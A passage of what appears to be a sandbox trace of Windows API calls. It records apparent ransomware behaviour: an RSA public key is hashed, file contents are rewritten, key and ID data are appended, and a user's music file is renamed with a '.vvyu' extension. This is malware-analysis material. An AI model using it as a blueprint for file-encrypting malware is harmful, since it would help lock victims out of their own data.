KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0192.797] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.797] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.797] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea920) returned 1 [0192.799] CryptCreateHash (in: hProv=0x6ea920, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0192.799] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.799] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0192.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0192.799] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0192.799] GetLastError () returned 0x0 [0192.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0192.799] GetLastError () returned 0x0 [0192.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0192.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0192.800] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0192.800] CryptReleaseContext (hProv=0x6ea920, dwFlags=0x0) returned 1 [0192.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0192.800] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0192.800] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0192.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0192.800] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0192.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0192.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x116b0) returned 0x2d45778 [0192.801] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0192.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0192.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0192.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0192.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0192.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41c80 [0192.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d78 [0192.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41cc8 [0192.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d90 [0192.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39dc0 [0192.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e20 [0192.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39dd8 [0192.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0192.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0192.802] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0192.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0192.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39dc0 | out: hHeap=0x6a0000) returned 1 [0192.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39dd8 | out: hHeap=0x6a0000) returned 1 [0192.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e20 | out: hHeap=0x6a0000) returned 1 [0192.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0192.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e20 [0192.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0192.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39dd8 [0192.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0192.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39dc0 [0192.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0192.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0192.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0192.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0192.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0192.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0192.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0192.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0192.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0192.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39dd8 | out: hHeap=0x6a0000) returned 1 [0192.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0192.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39dc0 | out: hHeap=0x6a0000) returned 1 [0192.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0192.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0192.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e20 | out: hHeap=0x6a0000) returned 1 [0192.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0192.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0192.805] GetCurrentThreadId () returned 0x264 [0192.805] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0192.805] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d454d0 [0192.805] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0192.805] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea920 [0192.805] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0192.805] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0192.805] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0192.805] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0192.805] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.806] GetCurrentThreadId () returned 0x264 [0192.806] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.806] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0192.806] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.807] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0192.807] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0192.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0192.807] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0192.807] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0192.807] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0192.807] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0192.807] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e20 [0192.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0192.807] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0192.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0192.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0192.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0192.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0192.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0192.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0192.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39dc0 [0192.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0192.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0192.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0192.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0192.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0192.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0192.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0192.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39dd8 [0192.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0192.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0192.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0192.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39da8 [0192.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0192.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e38 [0192.809] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0192.809] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0192.809] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0192.809] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e08 [0192.809] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0192.809] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39df0 [0192.809] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0192.809] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e50 [0192.809] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39df0 | out: hHeap=0x6a0000) returned 1 [0192.809] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39df0 [0192.809] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e08 | out: hHeap=0x6a0000) returned 1 [0192.809] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0192.809] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0192.809] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0192.809] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0192.809] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0192.809] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39dc0 | out: hHeap=0x6a0000) returned 1 [0192.809] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39dc0 [0192.809] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0192.809] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0192.809] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e20 | out: hHeap=0x6a0000) returned 1 [0192.809] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0192.810] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e50 | out: hHeap=0x6a0000) returned 1 [0192.810] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0192.810] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.810] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0192.810] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0192.810] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0192.810] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39dc0 | out: hHeap=0x6a0000) returned 1 [0192.810] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0192.810] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0192.810] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0192.811] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0192.811] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea920 | out: hHeap=0x6a0000) returned 1 [0192.811] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0192.812] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0192.812] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0192.812] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0192.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0192.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0192.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0192.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0192.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39df0 | out: hHeap=0x6a0000) returned 1 [0192.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0192.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e38 | out: hHeap=0x6a0000) returned 1 [0192.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0192.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39dd8 | out: hHeap=0x6a0000) returned 1 [0192.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39da8 | out: hHeap=0x6a0000) returned 1 [0192.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0192.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0192.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0192.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d90 | out: hHeap=0x6a0000) returned 1 [0192.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41cc8 | out: hHeap=0x6a0000) returned 1 [0192.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0192.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0192.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0192.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0192.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0192.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0192.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0192.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0192.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0192.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0192.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0192.818] WriteFile (in: hFile=0x584, lpBuffer=0x2d45778*, nNumberOfBytesToWrite=0x116a7, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d45778*, lpNumberOfBytesWritten=0x30ffb14*=0x116a7, lpOverlapped=0x0) returned 1 [0192.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0192.820] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x116ac, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.820] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0192.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0192.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0192.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0192.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0192.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0192.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0192.821] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0192.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.821] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.821] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0192.822] CloseHandle (hObject=0x584) returned 1 [0192.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x711c18 [0192.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8a0) returned 0x2d45778 [0192.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x711c18 | out: hHeap=0x6a0000) returned 1 [0192.824] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\n3veXEkNYxTCSfI4 ofL.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\n3vexeknyxtcsfi4 ofl.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\n3veXEkNYxTCSfI4 ofL.m4a.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\n3vexeknyxtcsfi4 ofl.m4a.vvyu")) returned 1 [0192.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0192.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.826] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 